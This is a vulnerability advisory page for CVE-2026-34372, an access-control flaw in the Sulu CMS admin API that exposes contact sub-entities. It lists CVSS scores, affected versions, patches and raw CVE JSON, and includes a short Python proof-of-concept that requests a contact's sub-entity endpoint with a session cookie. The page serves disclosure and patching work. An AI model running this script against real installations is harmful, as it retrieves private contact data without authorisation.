Security Vulnerability Report
中文
CVE-2026-34372 CVSS 2.7 LOW

CVE-2026-34372

Published: 2026-03-31 21:16:30
Last Modified: 2026-04-10 01:40:29
Source: [email protected]

Description

Sulu is an open-source PHP content management system based on the Symfony framework. From versions 1.0.0 to before 2.6.22, and 3.0.0 to before 3.0.5, a user which has permission for the Sulu Admin via at least one role could have access to the sub-entities of contacts via the admin API without even have permission for contacts. This issue has been patched in versions 2.6.22 and 3.0.5.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sulu:sulu:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sulu:sulu:*:*:*:*:*:*:*:* - VULNERABLE
Sulu CMS >= 1.0.0, < 2.6.22
Sulu CMS >= 3.0.0, < 3.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: Sulu CMS Sub-entity Access Control Bypass (CVE-2026-34372) # Description: Exploits insufficient permission checks on contact sub-entities via Admin API. TARGET_URL = "http://target-sulu-instance.com" # Attacker needs a valid session cookie of a user with at least one role in Admin SESSION_COOKIE = "SESSION_ID_HERE" CONTACT_ID = "1" # ID of the target contact def exploit(): headers = { "Cookie": f"PHPSESSID={SESSION_COOKIE}", "Content-Type": "application/json" } # The endpoint to access contact sub-entities # This should be restricted to users with specific 'contact' permissions endpoint = f"{TARGET_URL}/admin/api/contacts/{CONTACT_ID}/accounts" # Example sub-entity print(f"[*] Attempting to access sub-entity for contact ID: {CONTACT_ID}...") try: response = requests.get(endpoint, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Sub-entity data retrieved:") print(response.text) elif response.status_code == 403: print("[-] Access forbidden. Patched or permissions strict.") else: print(f"[-] Unexpected status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34372", "sourceIdentifier": "[email protected]", "published": "2026-03-31T21:16:29.840", "lastModified": "2026-04-10T01:40:29.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sulu is an open-source PHP content management system based on the Symfony framework. From versions 1.0.0 to before 2.6.22, and 3.0.0 to before 3.0.5, a user which has permission for the Sulu Admin via at least one role could have access to the sub-entities of contacts via the admin API without even have permission for contacts. This issue has been patched in versions 2.6.22 and 3.0.5."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sulu:sulu:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "2.6.22", "matchCriteriaId": "BB27FC33-8473-4331-A2D4-4D40F97CB960"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sulu:sulu:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.0.5", "matchCriteriaId": "E9A4E47B-0184-4443-8B0C-B3CB341D65D4"}]}]}], "references": [{"url": "https://github.com/sulu/sulu/releases/tag/2.6.22", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/sulu/sulu/releases/tag/3.0.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/sulu/sulu/security/advisories/GHSA-6h7h-m7p5-hjqp", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.